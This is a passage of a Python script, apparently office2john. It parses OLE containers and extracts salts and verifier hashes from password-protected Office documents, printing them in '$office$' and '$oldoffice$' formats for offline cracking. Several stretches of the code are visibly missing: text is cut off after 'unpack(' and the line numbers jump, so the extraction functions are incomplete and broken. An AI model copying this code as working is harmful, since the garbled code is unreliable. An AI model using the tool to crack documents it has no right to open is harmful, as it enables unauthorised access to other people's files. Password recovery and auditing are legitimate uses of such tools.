1168 | sect: sector index 1169 | returns a string containing the sector data. 1170 | """ 1171 | # [PL] this original code was wrong when sectors are 4KB instead of 1172 | # 512 bytes: 1173 | #self.fp.seek(512 + self.sectorsize * sect) 1174 | #[PL]: added safety checks: 1175 | #print "getsect(%X)" % sect 1176 | try: 1177 | self.fp.seek(self.sectorsize * (sect+1)) 1178 | except: 1179 | debug('getsect(): sect=%X, seek=%d, filesize=%d' % 1180 | (sect, self.sectorsize*(sect+1), self._filesize)) 1181 | self._raise_defect(DEFECT_FATAL, 'OLE sector index out of range') 1182 | sector = self.fp.read(self.sectorsize) 1183 | if len(sector) != self.sectorsize: 1184 | debug('getsect(): sect=%X, read=%d, sectorsize=%d' % 1185 | (sect, len(sector), self.sectorsize)) 1186 | self._raise_defect(DEFECT_FATAL, 'incomplete OLE sector') 1187 | return sector 1188 | 1189 | 1190 | def loaddirectory(self, sect): 1191 | """ 1192 | Load the directory. 1193 | sect: sector index of directory stream. 1194 | """ 1195 | # The directory is stored in a standard 1196 | # substream, independent of its size. 
1197 | 1198 | # open directory stream as a read-only file: 1199 | # (stream size is not known in advance) 1200 | self.directory_fp = self._open(sect) 1201 | 1202 | #[PL] to detect malformed documents and avoid DoS attacks, the maximum 1203 | # number of directory entries can be calculated: 1204 | max_entries = self.directory_fp.size / 128 1205 | debug('loaddirectory: size=%d, max_entries=%d' % 1206 | (self.directory_fp.size, max_entries)) 1207 | 1208 | # Create list of directory entries 1209 | #self.direntries = [] 1210 | # We start with a list of "None" object 1211 | self.direntries = [None] * int(max_entries) 1212 | ## for sid in xrange(max_entries): 1213 | ## entry = fp.read(128) 1214 | ## if not entry: 1215 | ## break 1216 | ## self.direntries.append(_OleDirectoryEntry(entry, sid, self)) 1217 | # load root entry: 1218 | root_entry = self._load_direntry(0) 1219 | # Root entry is the first entry: 1220 | self.root = self.direntries[0] 1221 | # read and build all storage trees, starting from the root: 1222 | self.root.build_storage_tree() 1223 | 1224 | 1225 | def _load_direntry (self, sid): 1226 | """ 1227 | Load a directory entry from the directory. 1228 | This method should only be called once for each storage/stream when 1229 | loading the directory. 1230 | sid: index of storage/stream in the directory. 1231 | return: a _OleDirectoryEntry object 1232 | raise: IOError if the entry has always been referenced. 
1233 | """ 1234 | # check if SID is OK: 1235 | if sid<0 or sid>=len(self.direntries): 1236 | self._raise_defect(DEFECT_FATAL, "OLE directory index out of range") 1237 | # check if entry was already referenced: 1238 | if self.direntries[sid] is not None: 1239 | self._raise_defect(DEFECT_INCORRECT, 1240 | "double reference for OLE stream/storage") 1241 | # if exception not raised, return the object 1242 | return self.direntries[sid] 1243 | self.directory_fp.seek(sid * 128) 1244 | entry = self.directory_fp.read(128) 1245 | self.direntries[sid] = _OleDirectoryEntry(entry, sid, self) 1246 | return self.direntries[sid] 1247 | 1248 | 1249 | def dumpdirectory(self): 1250 | """ 1251 | Dump directory (for debugging only) 1252 | """ 1253 | self.root.dump() 1254 | 1255 | 1256 | def _open(self, start, size = 0x7FFFFFFF, force_FAT=False): 1257 | """ 1258 | Open a stream, either in FAT or MiniFAT according to its size. 1259 | (openstream helper) 1260 | 1261 | start: index of first sector 1262 | size: size of stream (or nothing if size is unknown) 1263 | force_FAT: if False (default), stream will be opened in FAT or MiniFAT 1264 | according to size. If True, it will always be opened in FAT. 
1265 | """ 1266 | debug('OleFileIO.open(): sect=%d, size=%d, force_FAT=%s' % 1267 | (start, size, str(force_FAT))) 1268 | # stream size is compared to the MiniSectorCutoff threshold: 1269 | if size < self.minisectorcutoff and not force_FAT: 1270 | # ministream object 1271 | if not self.ministream: 1272 | # load MiniFAT if it wasn't already done: 1273 | self.loadminifat() 1274 | # The first sector index of the miniFAT stream is stored in the 1275 | # root directory entry: 1276 | size_ministream = self.root.size 1277 | debug('Opening MiniStream: sect=%d, size=%d' % 1278 | (self.root.isectStart, size_ministream)) 1279 | self.ministream = self._open(self.root.isectStart, 1280 | size_ministream, force_FAT=True) 1281 | return _OleStream(self.ministream, start, size, 0, 1282 | self.minisectorsize, self.minifat, 1283 | self.ministream.size) 1284 | else: 1285 | # standard stream 1286 | return _OleStream(self.fp, start, size, 512, 1287 | self.sectorsize, self.fat, self._filesize) 1288 | 1289 | 1290 | def _list(self, files, prefix, node): 1291 | """ 1292 | (listdir helper) 1293 | files: list of files to fill in 1294 | prefix: current location in storage tree (list of names) 1295 | node: current node (_OleDirectoryEntry object) 1296 | """ 1297 | prefix = prefix + [node.name] 1298 | for entry in node.kids: 1299 | if entry.kids: 1300 | self._list(files, prefix, entry) 1301 | else: 1302 | files.append(prefix[1:] + [entry.name]) 1303 | 1304 | 1305 | def listdir(self): 1306 | """ 1307 | Return a list of streams stored in this file 1308 | """ 1309 | files = [] 1310 | self._list(files, [], self.root) 1311 | return files 1312 | 1313 | 1314 | def _find(self, filename): 1315 | """ 1316 | Returns directory entry of given filename. (openstream helper) 1317 | Note: this method is case-insensitive. 
1318 | 1319 | filename: path of stream in storage tree (except root entry), either: 1320 | - a string using Unix path syntax, for example: 1321 | 'storage_1/storage_1.2/stream' 1322 | - a list of storage filenames, path to the desired stream/storage. 1323 | Example: ['storage_1', 'storage_1.2', 'stream'] 1324 | return: sid of requested filename 1325 | raise IOError if file not found 1326 | """ 1327 | 1328 | #filename = filename.decode() 1329 | # if filename is a string instead of a list, split it on slashes to 1330 | # convert to a list: 1331 | filename = filename.split('/') 1332 | # walk across storage tree, following given path: 1333 | node = self.root 1334 | for name in filename: 1335 | for kid in node.kids: 1336 | if kid.name.lower() == name.lower(): 1337 | break 1338 | else: 1339 | raise IOError("file not found") 1340 | node = kid 1341 | return node.sid 1342 | 1343 | 1344 | def openstream(self, filename): 1345 | """ 1346 | Open a stream as a read-only file object (StringIO). 1347 | 1348 | filename: path of stream in storage tree (except root entry), either: 1349 | - a string using Unix path syntax, for example: 1350 | 'storage_1/storage_1.2/stream' 1351 | - a list of storage filenames, path to the desired stream/storage. 1352 | Example: ['storage_1', 'storage_1.2', 'stream'] 1353 | return: file object (read-only) 1354 | raise IOError if filename not found, or if this is not a stream. 1355 | """ 1356 | sid = self._find(filename) 1357 | entry = self.direntries[sid] 1358 | if entry.entry_type != STGTY_STREAM: 1359 | raise IOError("this file is not a stream") 1360 | return self._open(entry.isectStart, entry.size) 1361 | 1362 | 1363 | def get_type(self, filename): 1364 | """ 1365 | Test if given filename exists as a stream or a storage in the OLE 1366 | container, and return its type. 1367 | 1368 | filename: path of stream in storage tree. 
(see openstream for syntax) 1369 | return: False if object does not exist, its entry type (>0) otherwise: 1370 | - STGTY_STREAM: a stream 1371 | - STGTY_STORAGE: a storage 1372 | - STGTY_ROOT: the root entry 1373 | """ 1374 | try: 1375 | sid = self._find(filename) 1376 | entry = self.direntries[sid] 1377 | return entry.entry_type 1378 | except: 1379 | return False 1380 | 1381 | 1382 | def exists(self, filename): 1383 | """ 1384 | Test if given filename exists as a stream or a storage in the OLE 1385 | container. 1386 | 1387 | filename: path of stream in storage tree. (see openstream for syntax) 1388 | return: True if object exist, else False. 1389 | """ 1390 | try: 1391 | sid = self._find(filename) 1392 | return True 1393 | except: 1394 | return False 1395 | 1396 | 1397 | def get_size(self, filename): 1398 | """ 1399 | Return size of a stream in the OLE container, in bytes. 1400 | 1401 | filename: path of stream in storage tree (see openstream for syntax) 1402 | return: size in bytes (long integer) 1403 | raise: IOError if file not found, TypeError if this is not a stream. 1404 | """ 1405 | sid = self._find(filename) 1406 | entry = self.direntries[sid] 1407 | if entry.entry_type != STGTY_STREAM: 1408 | #TODO: Should it return zero instead of raising an exception ? 1409 | raise TypeError('object is not an OLE stream') 1410 | return entry.size 1411 | 1412 | 1413 | def get_rootentry_name(self): 1414 | """ 1415 | Return root entry name. Should usually be 'Root Entry' or 'R' in most 1416 | implementations. 1417 | """ 1418 | return self.root.name 1419 | 1420 | 1421 | def getproperties(self, filename): 1422 | """ 1423 | Return properties described in substream. 

        filename: path of stream in storage tree (see openstream for syntax)
        return: a dictionary of values indexed by id (integer)
        """
        fp = self.openstream(filename)

        data = {}

        # property set stream header: 28 bytes (the clsid at s[8:24] is
        # parsed upstream in olefile but unused here)
        s = fp.read(28)
        # clsid = _clsid(s[8:24])

        # format id block: 20 bytes; the little-endian dword at +16 is the
        # file offset of the (single) property section
        s = fp.read(20)
        # fmtid = _clsid(s[:16])
        fp.seek(i32(s, 16))

        # read the whole section; the 4 padding bytes compensate for the
        # section-size dword just consumed, so offsets stored inside the
        # section (relative to its start) index directly into s
        s = b"****" + fp.read(i32(fp.read(4))-4)

        # s[4:8] holds the property count; each descriptor is an
        # (id, offset) pair of dwords starting at s[8:]
        for i in range(i32(s, 4)):

            id = i32(s, 8+i*8)
            offset = i32(s, 12+i*8)
            # the variant type tag is the first dword at the property's offset
            type = i32(s, offset)

            debug ('property id=%d: type=%d offset=%X' % (id, type, offset))

            # test for common types first (should perhaps use
            # a dictionary instead?)

            if type == VT_I2:
                # signed 16-bit: fold unsigned read back into two's complement
                value = i16(s, offset+4)
                if value >= 32768:
                    value = value - 65536
            elif type == VT_UI2:
                value = i16(s, offset+4)
            elif type in (VT_I4, VT_ERROR):
                value = i32(s, offset+4)
            elif type == VT_UI4:
                value = i32(s, offset+4) # FIXME
            elif type in (VT_BSTR, VT_LPSTR):
                # count includes the trailing NUL, hence the -1
                count = i32(s, offset+4)
                value = s[offset+8:offset+8+count-1]
            elif type == VT_BLOB:
                count = i32(s, offset+4)
                value = s[offset+8:offset+8+count]
            elif type == VT_LPWSTR:
                # count is in UTF-16 code units, i.e. count*2 bytes
                count = i32(s, offset+4)
                value = _unicode(s[offset+8:offset+8+count*2])
            elif type == VT_FILETIME:
                # two dwords combined into a 64-bit FILETIME
                value = i32(s, offset+4) + ((i32(s, offset+8))<<32)
                # FIXME: this is a 64-bit int: "number of 100ns periods
                # since Jan 1,1601".
Should map this to Python time 1478 | value = value / 10000000 # seconds 1479 | elif type == VT_UI1: 1480 | value = ord(s[offset+4]) 1481 | elif type == VT_CLSID: 1482 | value = _clsid(s[offset+4:offset+20]) 1483 | elif type == VT_CF: 1484 | count = i32(s, offset+4) 1485 | value = s[offset+8:offset+8+count] 1486 | else: 1487 | value = None # everything else yields "None" 1488 | 1489 | data[id] = value 1490 | 1491 | return data 1492 | 1493 | 1494 | # library ends, program starts 1495 | # Author: Worawit (sleepya), http://auntitled.blogspot.in 1496 | # http://msdn.microsoft.com/en-us/library/dd908560%28v=office.12%29 1497 | # http://msdn.microsoft.com/en-us/library/dd920360%28v=office.12%29 1498 | 1499 | from struct import unpack 1500 | import binascii 1501 | 1502 | def find_rc4_passinfo_xls(filename, stream): 1503 | while True: 1504 | pos = stream.tell() 1505 | if pos >= stream.size: 1506 | break # eof 1507 | 1508 | type = unpack("= 2 and minor_version == 2: 1615 | # RC4 CryptoAPI Encryption Header 1616 | unpack("= 2 and minor_version == 2: 1712 | # RC4 CryptoAPI Encryption Header 1713 | unpack(" -1: 1797 | sys.stderr.write("%s uses un-supported cipher algorithm %s, please file a bug! 
\n" \ 1798 | % (filename, cipherAlgorithm)) 1799 | return -4 1800 | 1801 | saltValue = node.attrib.get("saltValue") 1802 | assert(saltValue) 1803 | encryptedVerifierHashInput = node.attrib.get("encryptedVerifierHashInput") 1804 | encryptedVerifierHashValue = node.attrib.get("encryptedVerifierHashValue") 1805 | encryptedVerifierHashValue = binascii.hexlify(base64.decodestring(encryptedVerifierHashValue.encode())) 1806 | 1807 | sys.stdout.write("$office$*%d*%d*%d*%d*%s*%s*%s\n" % \ 1808 | ( version, 1809 | int(spinCount), int(keyBits), int(saltSize), 1810 | binascii.hexlify(base64.decodestring(saltValue.encode())).decode("ascii"), 1811 | binascii.hexlify(base64.decodestring(encryptedVerifierHashInput.encode())).decode("ascii"), 1812 | encryptedVerifierHashValue[0:64].decode("ascii"))) 1813 | return 0 1814 | else: 1815 | # Office 2007 file detected, process CryptoAPI Encryption Header 1816 | stm = stream 1817 | headerLength = unpack("', re.DOTALL) 1860 | return p.sub('', data) 1861 | 1862 | 1863 | def remove_extra_spaces(data): 1864 | p = re.compile(r'\s+') 1865 | return p.sub(' ', data) 1866 | 1867 | 1868 | def process_file(filename): 1869 | 1870 | # Test if a file is an OLE container: 1871 | try: 1872 | f = open(filename, "rb") 1873 | if f.read(2) == b"PK": 1874 | sys.stderr.write("%s : zip container found, file is " \ 1875 | "unencrypted?, invalid OLE file!\n" % filename) 1876 | f.close() 1877 | return 1 1878 | f.close() 1879 | 1880 | if not isOleFile(filename): 1881 | sys.stderr.write("%s : Invalid OLE file\n" % filename) 1882 | return 1 1883 | except Exception: 1884 | e = sys.exc_info()[1] 1885 | import traceback 1886 | traceback.print_exc() 1887 | sys.stderr.write("%s : OLE check failed, %s\n" % (filename, str(e))) 1888 | return 2 1889 | 1890 | # Open OLE file: 1891 | ole = OleFileIO(filename) 1892 | 1893 | stream = None 1894 | 1895 | # find "summary" streams 1896 | global have_summary, summary 1897 | have_summary = False 1898 | summary = [] 1899 | 1900 | for 
streamname in ole.listdir(): 1901 | streamname = streamname[-1] 1902 | if streamname[0] == "\005": 1903 | have_summary = True 1904 | props = ole.getproperties(streamname) 1905 | props = props.items() 1906 | for k, v in props: 1907 | if v is None: 1908 | continue 1909 | binary = False 1910 | if isinstance(v, bytes): 1911 | try: 1912 | v = v.decode() 1913 | except: 1914 | import traceback 1915 | traceback.print_exc() 1916 | if PY3: 1917 | check = isinstance(v, str) 1918 | else: 1919 | check = isinstance(v, str) or isinstance(v, unicode) 1920 | if check: 1921 | v = remove_html_tags(v) 1922 | v = v.replace(":", "") 1923 | v = remove_extra_spaces(v) 1924 | # binary filter 1925 | o = "" 1926 | for c in v: 1927 | if c in string.printable: 1928 | o = o + c 1929 | v = o 1930 | # v = filter(lambda x: x in string.printable, v) 1931 | # length filter 1932 | words = str(v).split() 1933 | words = filter(lambda x: len(x) < 20, words) 1934 | v = " ".join(words) 1935 | #[PL]: avoid to display too large or binary values: 1936 | #if len(v) > 50: 1937 | # v = v[:50] 1938 | # quick and dirty binary check: 1939 | for c in (1, 2, 3, 4, 5, 6, 7, 11, 12, 14, 15, 16, 17, 18, 19, 20, 1940 | 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31): 1941 | if chr(c) in v: 1942 | v = '(binary data)' 1943 | binary = True 1944 | break 1945 | if not binary: 1946 | summary.append(str(v)) 1947 | summary = " ".join(summary) 1948 | summary = remove_extra_spaces(summary) 1949 | 1950 | if ["EncryptionInfo"] in ole.listdir(): 1951 | # process Office 2003 / 2010 / 2013 files 1952 | return process_new_office(filename) 1953 | if ["Workbook"] in ole.listdir(): 1954 | stream = "Workbook" 1955 | elif ["WordDocument"] in ole.listdir(): 1956 | stream = "1Table" 1957 | elif ["PowerPoint Document"] in ole.listdir(): 1958 | stream = "Current User" 1959 | else: 1960 | sys.stderr.write("%s : No supported streams found\n" % filename) 1961 | return 2 1962 | 1963 | try: 1964 | workbookStream = ole.openstream(stream) 1965 | except: 
1966 | import traceback 1967 | traceback.print_exc() 1968 | sys.stderr.write("%s : stream %s not found!\n" % (filename, stream)) 1969 | return 2 1970 | 1971 | if workbookStream is None: 1972 | sys.stderr.write("%s : Error opening stream, %s\n" % filename) 1973 | (filename, stream) 1974 | return 3 1975 | 1976 | if stream == "Workbook": 1977 | typ = 0 1978 | passinfo = find_rc4_passinfo_xls(filename, workbookStream) 1979 | if passinfo is None: 1980 | return 4 1981 | elif stream == "1Table": 1982 | typ = 1 1983 | sdoc = ole.openstream("WordDocument") 1984 | ret = find_doc_type(filename, sdoc) 1985 | if not ret: 1986 | passinfo = find_rc4_passinfo_doc(filename, workbookStream) 1987 | if passinfo is None: 1988 | return 4 1989 | else: 1990 | return 5 1991 | else: 1992 | sppt = ole.openstream("Current User") 1993 | offset = find_ppt_type(filename, sppt) 1994 | sppt = ole.openstream("PowerPoint Document") 1995 | find_rc4_passinfo_ppt(filename, sppt, offset) 1996 | return 6 1997 | 1998 | (salt, verifier, verifierHash) = passinfo 1999 | if not have_summary: 2000 | sys.stdout.write("$oldoffice$%s*%s*%s*%s\n" % ( 2001 | typ, binascii.hexlify(salt).decode("ascii"), 2002 | binascii.hexlify(verifier).decode("ascii"), 2003 | binascii.hexlify(verifierHash).decode("ascii"))) 2004 | else: 2005 | sys.stdout.write("$oldoffice$%s*%s*%s*%s\n" % ( 2006 | typ, binascii.hexlify(salt).decode("ascii"), 2007 | binascii.hexlify(verifier).decode("ascii"), 2008 | binascii.hexlify(verifierHash).decode("ascii"))) 2009 | 2010 | workbookStream.close() 2011 | ole.close() 2012 | 2013 | return 0 2014 | 2015 | if __name__ == "__main__": 2016 | if len(sys.argv) < 2: 2017 | sys.stderr.write("Usage: %s \n" % sys.argv[0]) 2018 | sys.exit(1) 2019 | 2020 | for i in range(1, len(sys.argv)): 2021 | ret = process_file(sys.argv[i]) 2022 | --------------------------------------------------------------------------------